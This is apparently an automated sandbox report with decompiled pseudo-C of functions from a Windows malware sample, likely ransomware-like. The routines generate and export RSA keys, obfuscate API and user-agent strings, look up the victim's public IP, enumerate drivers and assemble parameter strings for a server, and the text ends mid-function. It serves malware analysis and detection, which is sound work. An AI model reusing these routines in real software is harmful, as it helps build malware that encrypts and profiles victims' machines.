						_v20 = 0;
						_t45 = GetModuleHandleA( &_v32);
						if(_t45 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t46 = GetProcAddress(_t45, _t19);
							if(_t46 == 0) {
								goto L13;
							} else {
								_push(_t64);
								_push(_t63);
								_push(_v8);
								if( *_t46() == 0) {
									goto L13;
								} else {
									_t60 = 0;
									if(_t63 != 0) {
										_t56 = _v12;
										_v16 = 0x1a;
										do {
											asm("cdq");
											 *((short*)(_t56 + _t60 * 2)) =  *((intOrPtr*)(_t65 + ( *(_t64 + _t60) & 0x000000ff) % _v16 * 2 - 0x64));
											_t60 = _t60 + 1;
										} while (_t60 < _t63);
									}
									_t54 = 1;
								}
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t45 = LoadLibraryA(_t18);
							if(_t45 == 0) {
								L13:
								_t54 = 0;
							} else {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000); // executed
						goto L15;
					}
				}
			}

0x00407c70
0x00407c72
0x00407c77
0x00407c7a
0x00407c7d
0x00407c85
0x00407d79
0x00407d81
0x00407c8b
0x00407c8b
0x00407c90
0x00407c90
0x00407c93
0x00407c98
0x00407c99
0x00407ca5
0x00407ca5
0x00407cab
0x00407cb1
0x00407cb5
0x00407d87
0x00407d95
0x00407da3
0x00407cc3
0x00407cc6
0x00407cce
0x00407cd5
0x00407cdc
0x00407ce2
0x00407ce6
0x00407ced
0x00407cf4
0x00407cfb
0x00407cff
0x00407d07
0x00407d17
0x00407d17
0x00407d1c
0x00407d24
0x00000000
0x00407d26
0x00407d26
0x00407d27
0x00407d28
0x00407d2f
0x00000000
0x00407d31
0x00407d31
0x00407d35
0x00407d37
0x00407d3a
0x00407d41
0x00407d45
0x00407d4e
0x00407d52
0x00407d53
0x00407d41
0x00407d57
0x00407d57
0x00407d2f
0x00407d09
0x00407d09
0x00407d0d
0x00407d15
0x00407d5e
0x00407d5e
0x00000000
0x00000000
0x00000000
0x00407d15
0x00407d65
0x00407d73
0x00000000
0x00407d73
0x00407cb5

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 00407C7D
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00407CAB
GetModuleHandleA.KERNEL32(?), ref: 00407CFF
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00407D0D
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00407D1C
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407D65
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00407D73
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407D87
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00407D95

Strings

CryptGenRandomAdvapi32.dll, xrefs: 00407D17, 00407D1A
Advapi32.dll, xrefs: 00407D09, 00407D0C

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: 0458a47c7d0f6a737997e540b1eda647f42b02ba3f55a885d4cf6adcdbbaa127
Instruction ID: 199b4cbb89f92d6933ab86ad2097cfc69592b150d2405189e4f4276a6cc67689
Opcode Fuzzy Hash: 0458a47c7d0f6a737997e540b1eda647f42b02ba3f55a885d4cf6adcdbbaa127
Instruction Fuzzy Hash: 8931F871E04209ABEB109FE4DD49BEEBB78EF44700F204079E505B62A1E775AE01CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00407DB0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 96
encryptionlibrarymemoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00407DB0(intOrPtr __ecx, intOrPtr __edx) {
				long* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t25;
				void* _t28;
				struct HINSTANCE__* _t33;
				_Unknown_base(*)()* _t34;
				long _t40;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t48;

				_t46 = 0;
				_v16 = __ecx;
				_t25 =  &_v8;
				_v12 = __edx;
				__imp__CryptAcquireContextW(_t25, 0, 0, 1, 0xf0000000); // executed
				if(_t25 == 0) {
					L10:
					return _t46;
				} else {
					_t42 = 0;
					do {
						_t4 = _t42 + 0x61; // 0x61
						 *((char*)(_t48 + _t42 - 0x38)) = _t4;
						_t42 = _t42 + 1;
					} while (_t42 < 0x1a);
					_t40 = __edx + 1;
					_t28 = VirtualAlloc(0, _t40, 0x3000, 0x40); // executed
					_t47 = _t28;
					if(_t47 == 0 || _v12 >= _t40) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t33 = GetModuleHandleA( &_v32);
						if(_t33 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t34 = GetProcAddress(_t33, _t19);
							if(_t34 != 0) {
								 *_t34(_v8, _v12, _v16);
								_t46 =  !=  ? 1 : _t46;
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t33 = LoadLibraryA(_t18);
							if(_t33 != 0) {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000); // executed
						goto L10;
					}
				}
			}

0x00407dc0
0x00407dc2
0x00407dc7
0x00407dcd
0x00407dd0
0x00407dd8
0x00407ea2
0x00407eaa
0x00407dde
0x00407dde
0x00407de0
0x00407de0
0x00407de3
0x00407de7
0x00407de8
0x00407df4
0x00407df8
0x00407dfe
0x00407e02
0x00407eb0
0x00407ebe
0x00407ecc
0x00407e11
0x00407e14
0x00407e1c
0x00407e23
0x00407e2a
0x00407e30
0x00407e34
0x00407e3b
0x00407e42
0x00407e49
0x00407e4d
0x00407e55
0x00407e65
0x00407e65
0x00407e6a
0x00407e72
0x00407e7d
0x00407e86
0x00407e86
0x00407e57
0x00407e57
0x00407e5b
0x00407e63
0x00000000
0x00000000
0x00407e63
0x00407e8e
0x00407e9c
0x00000000
0x00407e9c
0x00407e02

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,74CB66A0,00000000), ref: 00407DD0
VirtualAlloc.KERNEL32(00000000,00000011,00003000,00000040), ref: 00407DF8
GetModuleHandleA.KERNEL32(?), ref: 00407E4D
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00407E5B
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00407E6A
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407E8E
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00407E9C
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004036A5), ref: 00407EB0
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,004036A5), ref: 00407EBE

Strings

Advapi32.dll, xrefs: 00407E57, 00407E5A
CryptGenRandomAdvapi32.dll, xrefs: 00407E65, 00407E68

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: ecf7433da154a3d3e4de08d5f3ff40864c9027ea2fbed6340348b44d82ee8ddf
Instruction ID: be5cfa20fe97609e74d06931db444e7d7e20eeaeedb8336480d1c404223e93be
Opcode Fuzzy Hash: ecf7433da154a3d3e4de08d5f3ff40864c9027ea2fbed6340348b44d82ee8ddf
Instruction Fuzzy Hash: FA318471E05209AFEB109FA5DD49BEEBB78EF44701F104079E605B6291D774AE00CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00405D80 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00405D80(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				long* _v8;
				long* _v12;
				int _v16;
				long** _t15;
				long* _t16;
				long _t23;

				_t15 =  &_v8;
				__imp__CryptAcquireContextW(_t15, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
				if(_t15 != 0) {
					L6:
					_t16 = _v8;
					__imp__CryptGenKey(_t16, 0xa400, 0x8000001,  &_v12); // executed
					if(_t16 == 0) {
					}
					_v16 = 0;
					__imp__CryptExportKey(_v12, 0, 6, 0, _a4, _a8);
					__imp__CryptExportKey(_v12, 0, 7, 0, _a12, _a16); // executed
					CryptDestroyKey(_v12);
					CryptReleaseContext(_v8, 0);
					__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0x10); // executed
					return 1;
				}
				_t23 = GetLastError();
				if(_t23 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8); // executed
				if(_t23 != 0) {
					goto L6;
				}
				return 0;
			}

0x00405d91
0x00405d95
0x00405d9d
0x00405dd5
0x00405de3
0x00405de7
0x00405def
0x00405def
0x00405df2
0x00405e0b
0x00405e23
0x00405e2d
0x00405e39
0x00405e4e
0x00000000
0x00405e54
0x00405d9f
0x00405daa
0x00000000
0x00405dce
0x00405dbb
0x00405dc3
0x00000000
0x00405dcc
0x00000000

APIs

CryptAcquireContextW.ADVAPI32(0040491E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,00404916,?,0040491E), ref: 00405D95
GetLastError.KERNEL32(?,0040491E), ref: 00405D9F
CryptAcquireContextW.ADVAPI32(0040491E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0040491E), ref: 00405DBB
CryptGenKey.ADVAPI32(0040491E,0000A400,08000001,?,?,0040491E), ref: 00405DE7
CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000000), ref: 00405E0B
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?), ref: 00405E23
CryptDestroyKey.ADVAPI32(?), ref: 00405E2D
CryptReleaseContext.ADVAPI32(0040491E,00000000), ref: 00405E39
CryptAcquireContextW.ADVAPI32(0040491E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000010), ref: 00405E4E

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00405D8A, 00405DB0, 00405E43

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: Crypt$Context$Acquire$Export$DestroyErrorLastRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 137402220-1948191093
Opcode ID: 4ea6af53a05bc539ebf2c4aac83e9110a57bf35b6da581c5ea0214b087b6d0db
Instruction ID: a5e1c5bc4adb18f4c6cf36d0885f5ae2a65a9070c6c01f648420f3db759758e1
Opcode Fuzzy Hash: 4ea6af53a05bc539ebf2c4aac83e9110a57bf35b6da581c5ea0214b087b6d0db
Instruction Fuzzy Hash: FD216A75790308BBEB20CBA0DE4AF9B7779AB88B01F104425F701BA1D0C6B99940DB69

Uniqueness

Uniqueness Score: -1.00%

Function 004068F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56stringmemorynetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 004077F0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004079D4
Part of subcall function 004077F0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 004079ED

VirtualAlloc.KERNEL32(00000000,00002801,00003000,00000040,74CB66A0,?), ref: 0040690F
lstrlenW.KERNEL32(004103AC), ref: 0040691C

Part of subcall function 00407A00: InternetCloseHandle.WININET(?), ref: 00407A13
Part of subcall function 00407A00: InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 00407A32

lstrlenA.KERNEL32(00000000,ipv4bot.whatismyipaddress.com,004103B0,00000000,00000000,00000000,000027FF,?,00000000), ref: 0040694B
wsprintfW.USER32 ref: 00406963
VirtualFree.KERNELBASE(00000000,00000000,00008000,ipv4bot.whatismyipaddress.com,004103B0,00000000,00000000,00000000,000027FF,?,00000000), ref: 00406979
InternetCloseHandle.WININET(?), ref: 00406987

Strings

ipv4bot.whatismyipaddress.com, xrefs: 0040693C
GET, xrefs: 00406924

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpenVirtuallstrlen$AllocConnectFreewsprintf
String ID: GET$ipv4bot.whatismyipaddress.com
API String ID: 4289327240-2259699238
Opcode ID: f6e984b446ea9cd393b48de9e600680bd352efed8e23861790de7f30075ba64f
Instruction ID: 036ff581c335500f2984d10930e2f34b8e696fb6c4e233a2217fb5cd2a6ee9c0
Opcode Fuzzy Hash: f6e984b446ea9cd393b48de9e600680bd352efed8e23861790de7f30075ba64f
Instruction Fuzzy Hash: 6201B13574020577EB206B729E4EF9F3A38AB85B11F140036FA05F61C1DEB89959C6AD

Uniqueness

Uniqueness Score: -1.00%

Function 00402F50 Relevance: 10.6, APIs: 7, Instructions: 86
memoryCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00402F50(WCHAR* __ecx) {
				unsigned int _v8;
				char _v12;
				WCHAR* _v16;
				short _v2064;
				long _t17;
				void* _t18;
				void* _t20;
				WCHAR* _t23;
				int _t25;
				void* _t28;
				unsigned int _t31;
				void* _t35;
				intOrPtr* _t39;
				signed int _t40;

				_t39 = __imp__EnumDeviceDrivers;
				_v16 = __ecx;
				_v8 = 0;
				 *_t39( &_v12, 4,  &_v8); // executed
				_t17 = _v8;
				if(_t17 != 0) {
					_t18 = VirtualAlloc(0, _t17, 0x3000, 4); // executed
					_t35 = _t18;
					if(_t35 != 0) {
						_t20 =  *_t39(_t35, _v8,  &_v12, _t28); // executed
						if(_t20 == 0) {
							L10:
							VirtualFree(_t35, 0, 0x8000); // executed
							return 0;
						} else {
							_t40 = 0;
							_t31 = _v8 >> 2;
							if(_t31 > 0) {
								do {
									_t23 =  &_v2064;
									__imp__GetDeviceDriverBaseNameW( *((intOrPtr*)(_t35 + _t40 * 4)), _t23, 0x400); // executed
									if(_t23 == 0) {
										goto L9;
									} else {
										_t25 = lstrcmpiW( &_v2064, _v16); // executed
										if(_t25 == 0) {
											VirtualFree(_t35, 0, 0x8000);
											return 1;
										} else {
											goto L9;
										}
									}
									goto L12;
									L9:
									_t40 = _t40 + 1;
								} while (_t40 < _t31);
							}
							goto L10;
						}
					} else {
						return _t18;
					}
				} else {
					return _t17;
				}
				L12:
			}

0x00402f5a
0x00402f69
0x00402f6d
0x00402f74
0x00402f76
0x00402f7b
0x00402f8d
0x00402f93
0x00402f97
0x00402fa8
0x00402fac
0x00402ff2
0x00402ffa
0x00403008
0x00402fae
0x00402fb1
0x00402fb3
0x00402fb8
0x00402fc0
0x00402fc5
0x00402fcf
0x00402fd7
0x00000000
0x00402fd9
0x00402fe3
0x00402feb
0x00403011
0x00403022
0x00000000
0x00000000
0x00000000
0x00402feb
0x00000000
0x00402fed
0x00402fed
0x00402fee
0x00402fc0
0x00000000
0x00402fb8
0x00402f99
0x00402f9e
0x00402f9e
0x00402f81
0x00402f81
0x00402f81
0x00000000

APIs

K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 00402F74
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00402F8D

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: AllocDeviceDriversEnumVirtual
String ID:
API String ID: 4140748134-0
Opcode ID: 0a6431d7b680dec11b95763bc23b6023e0c9d24f66c7ef9fbc3c6dcadf6177f1
Instruction ID: ae1065d34e0a9f40daa088a41d748c469a9f576a3d92cbe81eb507f1f3ca9255
Opcode Fuzzy Hash: 0a6431d7b680dec11b95763bc23b6023e0c9d24f66c7ef9fbc3c6dcadf6177f1
Instruction Fuzzy Hash: 9621A43260011AABEB109B989D89FAAB7BCEB44715F1001B6EE04E61D0D7B19D05AB94

Uniqueness

Uniqueness Score: -1.00%

Function 004077F0 Relevance: 98.1, APIs: 2, Strings: 54, Instructions: 88
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004077F0(void* __ecx) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				short _v224;
				WCHAR* _t62;
				void* _t64;

				_v8 = 0;
				_v224 = 0x6f004d;
				_v220 = 0x69007a;
				_v216 = 0x6c006c;
				_v212 = 0x2f0061;
				_v208 = 0x2e0035;
				_v204 = 0x200030;
				_v200 = 0x570028;
				_v196 = 0x6e0069;
				_v192 = 0x6f0064;
				_v188 = 0x730077;
				_v184 = 0x4e0020;
				_v180 = 0x200054;
				_v176 = 0x2e0036;
				_v172 = 0x3b0031;
				_v168 = 0x570020;
				_v164 = 0x57004f;
				_v160 = 0x340036;
				_v156 = 0x200029;
				_v152 = 0x700041;
				_v148 = 0x6c0070;
				_v144 = 0x570065;
				_v140 = 0x620065;
				_v136 = 0x69004b;
				_v132 = 0x2f0074;
				_v128 = 0x330035;
				_v124 = 0x2e0037;
				_v120 = 0x360033;
				_v116 = 0x280020;
				_v112 = 0x48004b;
				_v108 = 0x4d0054;
				_v104 = 0x2c004c;
				_v100 = 0x6c0020;
				_v96 = 0x6b0069;
				_v92 = 0x200065;
				_v88 = 0x650047;
				_v84 = 0x6b0063;
				_v80 = 0x29006f;
				_v76 = 0x430020;
				_v72 = 0x720068;
				_v68 = 0x6d006f;
				_v64 = 0x2f0065;
				_v60 = 0x350035;
				_v56 = 0x30002e;
				_v52 = 0x32002e;
				_v48 = 0x380038;
				_v44 = 0x2e0033;
				_v40 = 0x370038;
				_v36 = 0x530020;
				_v32 = 0x660061;
				_v28 = 0x720061;
				_v24 = 0x2f0069;
				_v20 = 0x330035;
				_v16 = 0x2e0037;
				_v12 = 0x360033;
				_t62 = InternetOpenW( &_v224, 0, 0, 0, 0); // executed
				 *(__ecx + 4) = _t62;
				if(_t62 == 0) {
					_t64 = InternetOpenW( &_v224, 1, _t62, _t62, 0x10000000);
					 *(__ecx + 4) = _t64;
					return _t64;
				}
				return _t62;
			}

0x00407808
0x00407814
0x0040781f
0x00407829
0x00407833
0x0040783d
0x00407847
0x00407851
0x0040785b
0x00407865
0x0040786f
0x00407879
0x00407883
0x0040788d
0x00407897
0x004078a1
0x004078ab
0x004078b5
0x004078bf
0x004078c9
0x004078d3
0x004078dd
0x004078e7
0x004078f1
0x004078fb
0x00407902
0x00407909
0x00407910
0x00407917
0x0040791e
0x00407925
0x0040792c
0x00407933
0x0040793a
0x00407941
0x00407948
0x0040794f
0x00407956
0x0040795d
0x00407964
0x0040796b
0x00407972
0x00407979
0x00407980
0x00407987
0x0040798e
0x00407995
0x0040799c
0x004079a3
0x004079aa
0x004079b1
0x004079b8
0x004079bf
0x004079c6
0x004079cd
0x004079d4
0x004079d6
0x004079db
0x004079ed
0x004079ef
0x00000000
0x004079ef
0x004079f8

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004079D4
InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 004079ED

Strings

., xrefs: 00407980
M, xrefs: 00407814
L, xrefs: 0040792C
e, xrefs: 004078E7
8, xrefs: 0040798E
, xrefs: 004078A1
i, xrefs: 0040785B
8, xrefs: 0040799C
7, xrefs: 00407909
e, xrefs: 00407972
5, xrefs: 004079BF
l, xrefs: 00407829
3, xrefs: 004079CD
A, xrefs: 004078C9
5, xrefs: 0040783D
0, xrefs: 00407847
e, xrefs: 004078DD
3, xrefs: 00407910
6, xrefs: 004078B5
(, xrefs: 00407851
p, xrefs: 004078D3
t, xrefs: 004078FB
h, xrefs: 00407964
5, xrefs: 00407979
1, xrefs: 00407897
a, xrefs: 004079B1
o, xrefs: 00407956
, xrefs: 00407879
O, xrefs: 004078AB
3, xrefs: 00407995
i, xrefs: 004079B8
e, xrefs: 00407941
d, xrefs: 00407865
i, xrefs: 0040793A
w, xrefs: 0040786F
, xrefs: 004079A3
a, xrefs: 00407833
5, xrefs: 00407902
, xrefs: 0040795D
c, xrefs: 0040794F
7, xrefs: 004079C6
), xrefs: 004078BF
a, xrefs: 004079AA
6, xrefs: 0040788D
K, xrefs: 0040791E
, xrefs: 00407933
, xrefs: 00407917
G, xrefs: 00407948
K, xrefs: 004078F1
o, xrefs: 0040796B
T, xrefs: 00407925
., xrefs: 00407987
T, xrefs: 00407883
z, xrefs: 0040781F

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: $ $ $ $ $ $($)$.$.$0$1$3$3$3$5$5$5$5$6$6$7$7$8$8$A$G$K$K$L$M$O$T$T$a$a$a$c$d$e$e$e$e$h$i$i$i$l$o$o$p$t$w$z
API String ID: 2038078732-2805935662
Opcode ID: e653d41a08787fca1086a43a758d594d3257da7c4271a42bac81f70514e5fa4e
Instruction ID: 8ec0cbb63084930b06e9c442bfdedbe0f88dfa63fe684bf69a99aafbe0ca1518
Opcode Fuzzy Hash: e653d41a08787fca1086a43a758d594d3257da7c4271a42bac81f70514e5fa4e
Instruction Fuzzy Hash: 0541A8B4811369DEEB21CF91999879EBFF5BB04748F50819ED5087B201C7F60A89CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004069A0 Relevance: 89.4, APIs: 49, Strings: 2, Instructions: 196
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004069A0(intOrPtr* __ecx, WCHAR* _a4) {
				WCHAR* _t47;
				intOrPtr* _t91;
				intOrPtr _t94;
				WCHAR* _t96;

				_t91 = __ecx;
				_t96 = _a4;
				if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
					lstrcatW(_t96,  *(__ecx + 0x88));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x84));
					lstrcatW(_t96, "&");
				}
				if( *_t91 != 0) {
					lstrcatW(_t96,  *(_t91 + 4));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 8));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0xc)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x10));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x14));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x18)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x1c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x20));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x24)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x28));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x2c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x30)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x34));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x38));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x3c)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x40));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x44));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x48)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x4c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x50));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x54)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x58));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x5c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x60)) != 0) {
					_t47 = VirtualAlloc(0, 0x42, 0x3000, 0x40); // executed
					_t94 =  *((intOrPtr*)(_t91 + 0x6c));
					_a4 = _t47;
					if(_t94 == 0) {
						wsprintfW(_t47, L"undefined");
					} else {
						wsprintfW(_t47, L"%x%x", _t94,  *((intOrPtr*)(_t91 + 0x70)));
					}
					lstrcatW(_t96,  *(_t91 + 0x64));
					lstrcatW(_t96, "=");
					lstrcatW(_t96, _a4);
					lstrcatW(_t96, "&");
					VirtualFree(_a4, 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t91 + 0x74)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x78));
					lstrcatW(_t96, "=");
